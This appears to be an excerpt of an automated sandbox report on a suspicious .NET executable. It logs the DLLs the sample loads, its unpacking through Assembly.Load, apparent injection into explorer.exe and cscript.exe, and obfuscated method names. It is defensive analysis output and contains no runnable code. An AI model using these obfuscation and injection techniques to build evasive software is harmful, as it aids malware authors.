          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: yPURXYpFVuXra2o.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: yPURXYpFVuXra2o.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cscript.pdbUGP source: yPURXYpFVuXra2o.exe, 00000005.00000002.30408359939.0000000003710000.00000040.10000000.00040000.00000000.sdmp, yPURXYpFVuXra2o.exe, 00000005.00000002.30406647989.0000000001368000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: yPURXYpFVuXra2o.exe, 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000003.30409751558.0000000004FCD000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000003.30406496494.0000000004E20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: yPURXYpFVuXra2o.exe, yPURXYpFVuXra2o.exe, 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000007.00000003.30409751558.0000000004FCD000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.00000000052AD000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000002.35220640109.0000000005180000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000007.00000003.30406496494.0000000004E20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cscript.pdb source: yPURXYpFVuXra2o.exe, 00000005.00000002.30408359939.0000000003710000.00000040.10000000.00040000.00000000.sdmp, yPURXYpFVuXra2o.exe, 00000005.00000002.30406647989.0000000001368000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000007.00000002.35219293068.0000000000400000.00000040.80000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: yPURXYpFVuXra2o.exe, BuscarVentas.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs.Net Code: SMOHeHfa4K System.Reflection.Assembly.Load(byte[])
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs.Net Code: SMOHeHfa4K System.Reflection.Assembly.Load(byte[])
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, VMZlXQ6XXMrbHEeS6Q.cs.Net Code: SMOHeHfa4K System.Reflection.Assembly.Load(byte[])
          Source: 3.2.yPURXYpFVuXra2o.exe.2febbdc.6.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 3.2.yPURXYpFVuXra2o.exe.74f0000.13.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 6.2.explorer.exe.130ff840.0.raw.unpack, BuscarVentas.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0040AA82 LoadLibraryW,GetProcAddress,FreeLibrary,7_2_0040AA82
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_00417AB7 push cs; iretd 5_2_00417ACC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_00416CFD push edi; ret 5_2_00416CFE
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041D4B5 push eax; ret 5_2_0041D508
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041D56C push eax; ret 5_2_0041D572
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041D502 push eax; ret 5_2_0041D508
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041D50B push eax; ret 5_2_0041D572
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0041E5A5 push ds; ret 5_2_0041E5A6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017D21AD pushad ; retf 0004h5_2_017D223F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017D97A1 push es; iretd 5_2_017D97A8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018008CD push ecx; mov dword ptr [esp], ecx5_2_018008D6
          Source: C:\Windows\explorer.exeCode function: 6_2_110E29B5 push esp; retn 0000h6_2_110E2AE7
          Source: C:\Windows\explorer.exeCode function: 6_2_110E2B02 push esp; retn 0000h6_2_110E2B03
          Source: C:\Windows\explorer.exeCode function: 6_2_110E2B1E push esp; retn 0000h6_2_110E2B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_116889B5 push esp; retn 0000h6_2_11688AE7
          Source: C:\Windows\explorer.exeCode function: 6_2_11688B02 push esp; retn 0000h6_2_11688B03
          Source: C:\Windows\explorer.exeCode function: 6_2_11688B1E push esp; retn 0000h6_2_11688B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_139749B5 push esp; retn 0000h6_2_13974AE7
          Source: C:\Windows\explorer.exeCode function: 6_2_13974B1E push esp; retn 0000h6_2_13974B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_13974B02 push esp; retn 0000h6_2_13974B03
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0040DF11 push ecx; ret 7_2_0040DF24
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051897A1 push es; iretd 7_2_051897A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051821AD pushad ; retf 0004h7_2_0518223F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_051B08CD push ecx; mov dword ptr [esp], ecx7_2_051B08D6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301D502 push eax; ret 7_2_0301D508
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301D50B push eax; ret 7_2_0301D572
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301D56C push eax; ret 7_2_0301D572
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301E5A5 push ds; ret 7_2_0301E5A6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301E42D push edi; ret 7_2_0301E42F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301E43F push edi; ret 7_2_0301E441
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_0301D4B5 push eax; ret 7_2_0301D508
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_03017AB7 push cs; iretd 7_2_03017ACC
          Source: yPURXYpFVuXra2o.exeStatic PE information: section name: .text entropy: 7.625137960095419
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, nfbcuHVRZYUkLRlB48.csHigh entropy of concatenated method names: 'E0Qy00jsNo', 'uPuyw5XE2D', 'zl9MdbnpUn', 'O3IMqDnstD', 'TfmMQlck17', 'S2PMlBonFq', 'isIMFglKSI', 'CHHMsJHUfA', 'Y1KMI8cHpT', 'hp0MA746Ts'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, oerYe9nG7jNn8seA7q.csHigh entropy of concatenated method names: 'JFBMP3uO4u', 'jWBMjAKYwg', 'sE3MWw3YHF', 'kW0MnKwG9o', 'NgPMEvipgK', 'j7kMGiQXnH', 'RZ9MmknHkb', 'jJUMkfuIUq', 'GCIMJI8yLT', 'hS9MOdd1Pw'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, PpfYfgodU401qo7Lpm.csHigh entropy of concatenated method names: 'xloeG0Bru', 'YPxPSR9D5', 'lFIj2CN4p', 'rx7wuV5YS', 'Qokn7WGWo', 'iA2VqslUk', 'J9eFeYaY60ogxdauXX', 'YR68HfPAm5mYiuXrbd', 'YpVkd9Sit', 'W6LOUj0so'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, T67RTEldD6gRCu4UHx.csHigh entropy of concatenated method names: 'cSw5iTo7gb', 'ltJ5r25J48', 'r2s5vpvmui', 'ToString', 'LGb5DMlkZ9', 'RA85RPsEkI', 'k0Wq8tB6dHm4FgLamhD', 'COO27XBq9Z8VnYmfsxK'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, FTnamxBWHIJsI2vsTR.csHigh entropy of concatenated method names: 'Y8FJ4sypVJ', 'qHLJUkPSjT', 'DfJJHnHn7X', 'OOmJ9uVG7p', 'Q1MJcvaL0E', 'zitJykUjX9', 'UElJ55g1tp', 'YF1kRgiE9j', 'KCtkgHOhs5', 'AhTkKmLHHn'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, j5YhcCSwBm4tqgWkb6.csHigh entropy of concatenated method names: 'jLv5NqZVMQ', 'bMg5cbWqoX', 'v0y5yOSWfb', 'wIF5Xj3304', 'zRc566ZEKI', 'feLyvwQ4E3', 'v6kyDv4aIm', 'AtmyRPk0LT', 'D4qygLhEIt', 'pIEyKEPbp2'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, vCPwVtcITDW9hLOASV.csHigh entropy of concatenated method names: 'Dispose', 'Gtm4KBYDbJ', 'hXNoh53Hxn', 'BcdWWHOh1B', 'Wgy4B75HiP', 'Oyn4zxUk8t', 'ProcessDialogKey', 'FycobepjJK', 'v6io4fJ7ht', 'lwHooSTnam'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, VMZlXQ6XXMrbHEeS6Q.csHigh entropy of concatenated method names: 'zUbUNuZPRX', 'NRtU95TIRR', 'WqPUc9n9I8', 'lnwUMcoS07', 'DsCUyZ6ACU', 'oiAU5luSSk', 'JPLUX1CaGg', 'ugBU6quxU6', 'WK8UptFqlp', 'n9aUCOKGZa'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, Y2xY0TW46hlUdOF7rO.csHigh entropy of concatenated method names: 'WkacY3tWnW', 'rNec7T6FOC', 'AdTciEOR6r', 'PSicrvmwxh', 'dF1cv6aWu9', 'e28cD8LVC1', 'HoAcRx79eI', 'js9cgAET6N', 'uWwcKuaZ8V', 'D0GcB0akx2'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, cs7hWL4brPTs6hwVWeX.csHigh entropy of concatenated method names: 'l3VJ1bgXTu', 'Gd0JaZIPhn', 'OR8JerVmLi', 'FXrJPQ4QWP', 'J9BJ02v5LC', 'J4cJjIrn5t', 'yNtJwVTYAo', 'ALLJWJ3LqI', 'DLhJnOOTRa', 'Gh3JVZdQgF'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, gepjJKKT6ifJ7htpwH.csHigh entropy of concatenated method names: 'wbgkSWpm15', 'XJUkhqVLIN', 'bYqkdgZwQM', 'muZkqvEXMj', 'A3nkYHILHD', 'RtakQZbX0Y', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, Hph3XCHfa2weuYqlUh.csHigh entropy of concatenated method names: 'eDB4X2xY0T', 'b6h46lUdOF', 'fG74CjNn8s', 'zA74uqufbc', 'WlB4E4855Y', 'HcC4GwBm4t', 'kis5WaZj28DBFFF7iM', 'NIuBibovWYuofC5BOt', 'yXw44XidEb', 'LGb4UQskAQ'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, LtTDvB4U3GTbSUTyrDW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h0DOYg5ACd', 'bomO76OIT2', 'y5SOiZQsHk', 'gP0OruPclf', 'jnKOv99cUT', 'saBODbcvOU', 'oemORmRcLU'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, e71uUHZabblQaysFKP.csHigh entropy of concatenated method names: 'WpZ3Wmjoep', 'IC63nC8Lba', 'acQ3S5aCsV', 'J5F3hHC8Vm', 'MXN3qM94S7', 'TwC3Q1ELES', 'mtF3F2yNPY', 'Ocb3s5S9AF', 'zU53AlfG6V', 'tEb3LoI0T1'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, Xy75HigPLynxUk8tVy.csHigh entropy of concatenated method names: 'fTnk9n0mML', 'lgWkc0yDXc', 'iHpkMQT4su', 'xOskyc1VDR', 'aaBk5nUBvV', 'OWmkXtrcSr', 'o13k6Mdqo6', 'fPVkplpQTt', 'GJLkCVdTBx', 'AYBkuVmU0M'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, ivabNJIhnbOdkS7rrr.csHigh entropy of concatenated method names: 'o1qX1oJVTN', 'B9oXamdYkC', 'B8XXeRYNPB', 'MOUXP4OBAy', 'nP5X0BQfkF', 'nKbXjW4VvV', 'xGCXwYsiyZ', 'ygqXWSac3I', 'Jy6XnoAFUn', 'xtFXV08hQV'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, cSTkKnzu2HtwIbII1D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qYbJ3NV0wM', 'XccJEmKgpy', 'r0KJGDnVlG', 'TQMJmvjmvK', 'fERJkraUxu', 'DGhJJOfTHF', 'knEJORKHuy'
          Source: 3.2.yPURXYpFVuXra2o.exe.6be0000.12.raw.unpack, jSdj7uDf7R3NOvSWKI.csHigh entropy of concatenated method names: 'cwemgCHmSA', 'DKUmBx45SN', 'UMOkbY6cRg', 'Yc1k4NHj9u', 'YILmLHm7Aw', 'd8Jm8FojyM', 'BAPmZSkCNo', 'PtumYxUQQB', 'Hxqm70LOeV', 'z4NmiGRYIB'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, nfbcuHVRZYUkLRlB48.csHigh entropy of concatenated method names: 'E0Qy00jsNo', 'uPuyw5XE2D', 'zl9MdbnpUn', 'O3IMqDnstD', 'TfmMQlck17', 'S2PMlBonFq', 'isIMFglKSI', 'CHHMsJHUfA', 'Y1KMI8cHpT', 'hp0MA746Ts'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, oerYe9nG7jNn8seA7q.csHigh entropy of concatenated method names: 'JFBMP3uO4u', 'jWBMjAKYwg', 'sE3MWw3YHF', 'kW0MnKwG9o', 'NgPMEvipgK', 'j7kMGiQXnH', 'RZ9MmknHkb', 'jJUMkfuIUq', 'GCIMJI8yLT', 'hS9MOdd1Pw'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, PpfYfgodU401qo7Lpm.csHigh entropy of concatenated method names: 'xloeG0Bru', 'YPxPSR9D5', 'lFIj2CN4p', 'rx7wuV5YS', 'Qokn7WGWo', 'iA2VqslUk', 'J9eFeYaY60ogxdauXX', 'YR68HfPAm5mYiuXrbd', 'YpVkd9Sit', 'W6LOUj0so'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, T67RTEldD6gRCu4UHx.csHigh entropy of concatenated method names: 'cSw5iTo7gb', 'ltJ5r25J48', 'r2s5vpvmui', 'ToString', 'LGb5DMlkZ9', 'RA85RPsEkI', 'k0Wq8tB6dHm4FgLamhD', 'COO27XBq9Z8VnYmfsxK'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, FTnamxBWHIJsI2vsTR.csHigh entropy of concatenated method names: 'Y8FJ4sypVJ', 'qHLJUkPSjT', 'DfJJHnHn7X', 'OOmJ9uVG7p', 'Q1MJcvaL0E', 'zitJykUjX9', 'UElJ55g1tp', 'YF1kRgiE9j', 'KCtkgHOhs5', 'AhTkKmLHHn'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, j5YhcCSwBm4tqgWkb6.csHigh entropy of concatenated method names: 'jLv5NqZVMQ', 'bMg5cbWqoX', 'v0y5yOSWfb', 'wIF5Xj3304', 'zRc566ZEKI', 'feLyvwQ4E3', 'v6kyDv4aIm', 'AtmyRPk0LT', 'D4qygLhEIt', 'pIEyKEPbp2'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, vCPwVtcITDW9hLOASV.csHigh entropy of concatenated method names: 'Dispose', 'Gtm4KBYDbJ', 'hXNoh53Hxn', 'BcdWWHOh1B', 'Wgy4B75HiP', 'Oyn4zxUk8t', 'ProcessDialogKey', 'FycobepjJK', 'v6io4fJ7ht', 'lwHooSTnam'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, VMZlXQ6XXMrbHEeS6Q.csHigh entropy of concatenated method names: 'zUbUNuZPRX', 'NRtU95TIRR', 'WqPUc9n9I8', 'lnwUMcoS07', 'DsCUyZ6ACU', 'oiAU5luSSk', 'JPLUX1CaGg', 'ugBU6quxU6', 'WK8UptFqlp', 'n9aUCOKGZa'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, Y2xY0TW46hlUdOF7rO.csHigh entropy of concatenated method names: 'WkacY3tWnW', 'rNec7T6FOC', 'AdTciEOR6r', 'PSicrvmwxh', 'dF1cv6aWu9', 'e28cD8LVC1', 'HoAcRx79eI', 'js9cgAET6N', 'uWwcKuaZ8V', 'D0GcB0akx2'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, cs7hWL4brPTs6hwVWeX.csHigh entropy of concatenated method names: 'l3VJ1bgXTu', 'Gd0JaZIPhn', 'OR8JerVmLi', 'FXrJPQ4QWP', 'J9BJ02v5LC', 'J4cJjIrn5t', 'yNtJwVTYAo', 'ALLJWJ3LqI', 'DLhJnOOTRa', 'Gh3JVZdQgF'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, gepjJKKT6ifJ7htpwH.csHigh entropy of concatenated method names: 'wbgkSWpm15', 'XJUkhqVLIN', 'bYqkdgZwQM', 'muZkqvEXMj', 'A3nkYHILHD', 'RtakQZbX0Y', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, Hph3XCHfa2weuYqlUh.csHigh entropy of concatenated method names: 'eDB4X2xY0T', 'b6h46lUdOF', 'fG74CjNn8s', 'zA74uqufbc', 'WlB4E4855Y', 'HcC4GwBm4t', 'kis5WaZj28DBFFF7iM', 'NIuBibovWYuofC5BOt', 'yXw44XidEb', 'LGb4UQskAQ'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, LtTDvB4U3GTbSUTyrDW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h0DOYg5ACd', 'bomO76OIT2', 'y5SOiZQsHk', 'gP0OruPclf', 'jnKOv99cUT', 'saBODbcvOU', 'oemORmRcLU'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, e71uUHZabblQaysFKP.csHigh entropy of concatenated method names: 'WpZ3Wmjoep', 'IC63nC8Lba', 'acQ3S5aCsV', 'J5F3hHC8Vm', 'MXN3qM94S7', 'TwC3Q1ELES', 'mtF3F2yNPY', 'Ocb3s5S9AF', 'zU53AlfG6V', 'tEb3LoI0T1'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, Xy75HigPLynxUk8tVy.csHigh entropy of concatenated method names: 'fTnk9n0mML', 'lgWkc0yDXc', 'iHpkMQT4su', 'xOskyc1VDR', 'aaBk5nUBvV', 'OWmkXtrcSr', 'o13k6Mdqo6', 'fPVkplpQTt', 'GJLkCVdTBx', 'AYBkuVmU0M'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, ivabNJIhnbOdkS7rrr.csHigh entropy of concatenated method names: 'o1qX1oJVTN', 'B9oXamdYkC', 'B8XXeRYNPB', 'MOUXP4OBAy', 'nP5X0BQfkF', 'nKbXjW4VvV', 'xGCXwYsiyZ', 'ygqXWSac3I', 'Jy6XnoAFUn', 'xtFXV08hQV'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, cSTkKnzu2HtwIbII1D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qYbJ3NV0wM', 'XccJEmKgpy', 'r0KJGDnVlG', 'TQMJmvjmvK', 'fERJkraUxu', 'DGhJJOfTHF', 'knEJORKHuy'
          Source: 3.2.yPURXYpFVuXra2o.exe.4330e00.9.raw.unpack, jSdj7uDf7R3NOvSWKI.csHigh entropy of concatenated method names: 'cwemgCHmSA', 'DKUmBx45SN', 'UMOkbY6cRg', 'Yc1k4NHj9u', 'YILmLHm7Aw', 'd8Jm8FojyM', 'BAPmZSkCNo', 'PtumYxUQQB', 'Hxqm70LOeV', 'z4NmiGRYIB'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, nfbcuHVRZYUkLRlB48.csHigh entropy of concatenated method names: 'E0Qy00jsNo', 'uPuyw5XE2D', 'zl9MdbnpUn', 'O3IMqDnstD', 'TfmMQlck17', 'S2PMlBonFq', 'isIMFglKSI', 'CHHMsJHUfA', 'Y1KMI8cHpT', 'hp0MA746Ts'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, oerYe9nG7jNn8seA7q.csHigh entropy of concatenated method names: 'JFBMP3uO4u', 'jWBMjAKYwg', 'sE3MWw3YHF', 'kW0MnKwG9o', 'NgPMEvipgK', 'j7kMGiQXnH', 'RZ9MmknHkb', 'jJUMkfuIUq', 'GCIMJI8yLT', 'hS9MOdd1Pw'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, PpfYfgodU401qo7Lpm.csHigh entropy of concatenated method names: 'xloeG0Bru', 'YPxPSR9D5', 'lFIj2CN4p', 'rx7wuV5YS', 'Qokn7WGWo', 'iA2VqslUk', 'J9eFeYaY60ogxdauXX', 'YR68HfPAm5mYiuXrbd', 'YpVkd9Sit', 'W6LOUj0so'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, T67RTEldD6gRCu4UHx.csHigh entropy of concatenated method names: 'cSw5iTo7gb', 'ltJ5r25J48', 'r2s5vpvmui', 'ToString', 'LGb5DMlkZ9', 'RA85RPsEkI', 'k0Wq8tB6dHm4FgLamhD', 'COO27XBq9Z8VnYmfsxK'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, FTnamxBWHIJsI2vsTR.csHigh entropy of concatenated method names: 'Y8FJ4sypVJ', 'qHLJUkPSjT', 'DfJJHnHn7X', 'OOmJ9uVG7p', 'Q1MJcvaL0E', 'zitJykUjX9', 'UElJ55g1tp', 'YF1kRgiE9j', 'KCtkgHOhs5', 'AhTkKmLHHn'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, j5YhcCSwBm4tqgWkb6.csHigh entropy of concatenated method names: 'jLv5NqZVMQ', 'bMg5cbWqoX', 'v0y5yOSWfb', 'wIF5Xj3304', 'zRc566ZEKI', 'feLyvwQ4E3', 'v6kyDv4aIm', 'AtmyRPk0LT', 'D4qygLhEIt', 'pIEyKEPbp2'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, vCPwVtcITDW9hLOASV.csHigh entropy of concatenated method names: 'Dispose', 'Gtm4KBYDbJ', 'hXNoh53Hxn', 'BcdWWHOh1B', 'Wgy4B75HiP', 'Oyn4zxUk8t', 'ProcessDialogKey', 'FycobepjJK', 'v6io4fJ7ht', 'lwHooSTnam'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, VMZlXQ6XXMrbHEeS6Q.csHigh entropy of concatenated method names: 'zUbUNuZPRX', 'NRtU95TIRR', 'WqPUc9n9I8', 'lnwUMcoS07', 'DsCUyZ6ACU', 'oiAU5luSSk', 'JPLUX1CaGg', 'ugBU6quxU6', 'WK8UptFqlp', 'n9aUCOKGZa'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, Y2xY0TW46hlUdOF7rO.csHigh entropy of concatenated method names: 'WkacY3tWnW', 'rNec7T6FOC', 'AdTciEOR6r', 'PSicrvmwxh', 'dF1cv6aWu9', 'e28cD8LVC1', 'HoAcRx79eI', 'js9cgAET6N', 'uWwcKuaZ8V', 'D0GcB0akx2'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, cs7hWL4brPTs6hwVWeX.csHigh entropy of concatenated method names: 'l3VJ1bgXTu', 'Gd0JaZIPhn', 'OR8JerVmLi', 'FXrJPQ4QWP', 'J9BJ02v5LC', 'J4cJjIrn5t', 'yNtJwVTYAo', 'ALLJWJ3LqI', 'DLhJnOOTRa', 'Gh3JVZdQgF'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, gepjJKKT6ifJ7htpwH.csHigh entropy of concatenated method names: 'wbgkSWpm15', 'XJUkhqVLIN', 'bYqkdgZwQM', 'muZkqvEXMj', 'A3nkYHILHD', 'RtakQZbX0Y', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, Hph3XCHfa2weuYqlUh.csHigh entropy of concatenated method names: 'eDB4X2xY0T', 'b6h46lUdOF', 'fG74CjNn8s', 'zA74uqufbc', 'WlB4E4855Y', 'HcC4GwBm4t', 'kis5WaZj28DBFFF7iM', 'NIuBibovWYuofC5BOt', 'yXw44XidEb', 'LGb4UQskAQ'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, LtTDvB4U3GTbSUTyrDW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h0DOYg5ACd', 'bomO76OIT2', 'y5SOiZQsHk', 'gP0OruPclf', 'jnKOv99cUT', 'saBODbcvOU', 'oemORmRcLU'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, e71uUHZabblQaysFKP.csHigh entropy of concatenated method names: 'WpZ3Wmjoep', 'IC63nC8Lba', 'acQ3S5aCsV', 'J5F3hHC8Vm', 'MXN3qM94S7', 'TwC3Q1ELES', 'mtF3F2yNPY', 'Ocb3s5S9AF', 'zU53AlfG6V', 'tEb3LoI0T1'
          Source: 3.2.yPURXYpFVuXra2o.exe.42c0fe0.8.raw.unpack, Xy75HigPLynxUk8tVy.csHigh entropy of concatenated method names: 'fTnk9n0mML', 'lgWkc0yDXc', 'iHpkMQT4su', 'xOskyc1VDR', 'aaBk5nUBvV', 'OWmkXtrcSr', 'o13k6Mdqo6', 'fPVkplpQTt', 'GJLkCVdTBx', 'AYBkuVmU0M'
